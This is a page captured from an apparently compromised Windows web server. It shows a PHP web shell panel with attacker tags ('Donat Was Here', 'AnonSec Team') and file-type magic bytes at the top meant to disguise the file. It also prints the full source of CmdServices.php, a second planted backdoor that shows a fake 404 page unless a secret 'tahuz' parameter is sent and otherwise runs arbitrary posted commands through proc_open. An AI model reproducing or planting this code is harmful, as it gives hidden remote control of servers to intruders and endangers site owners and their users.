GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/Setup/WebServices/WebServices.cmd/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/Setup/WebServices/WebServices.cmd/CmdServices.php
<?php
session_start();

// Ambil domain saat ini (HTTP/HTTPS + host)
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'];
$self_404 = $scheme . $host . "/s.php"; // file palsu yg pasti 404

// Jika ?tahuz tidak ada, tampilkan halaman 404 palsu dari situs ini
if (!isset($_GET['tahuz'])) {
    $ch = curl_init($self_404);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_HEADER => true,
        CURLOPT_NOBODY => false,
        CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0'
    ]);
    $resp = curl_exec($ch);
    $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    $header = substr($resp, 0, $headerSize);
    $body = substr($resp, $headerSize);

    foreach (explode("rn", $header) as $line) {
        if (stripos($line, 'Content-Length') === 0 || stripos($line, 'Transfer-Encoding') === 0) continue;
        header($line);
    }
    header("HTTP/1.1 $status");
    echo $body;
    exit;
}

// === SHELL MODE ===
if (!isset($_SESSION['cwd'])) {
    $_SESSION['cwd'] = getcwd();
}
if (isset($_POST['cd']) && is_dir($_POST['cd'])) {
    $_SESSION['cwd'] = realpath($_POST['cd']);
}
chdir($_SESSION['cwd']);
$cwd = getcwd();

// Jalankan perintah
$output = '';
if (isset($_POST['cmd'])) {
    $desc = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $p = proc_open($_POST['cmd'], $desc, $pipes);
    if (is_resource($p)) {
        $output = stream_get_contents($pipes[1]);
        proc_close($p);
    } else {
        $output = "proc_open error";
    }
}
?>
<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>Shell</title></head>
<body style="background:#000;color:#0f0;font-family:monospace;padding:20px;">
<h3>Shell Aktif | Dir: <?= htmlspecialchars($cwd) ?></h3>

<form method="post">
    <input type="text" name="cd" placeholder="/path/to/dir" size="60">
    <button>Ganti Direktori</button>
</form>

<form method="post" style="margin-top:10px;">
    <input type="text" name="cmd" value="ls -la" size="60">
    <button>Jalankan</button>
</form>

<pre><?= htmlspecialchars($output) ?></pre>
</body>
</html>

Anon7 - 2022
AnonSec Team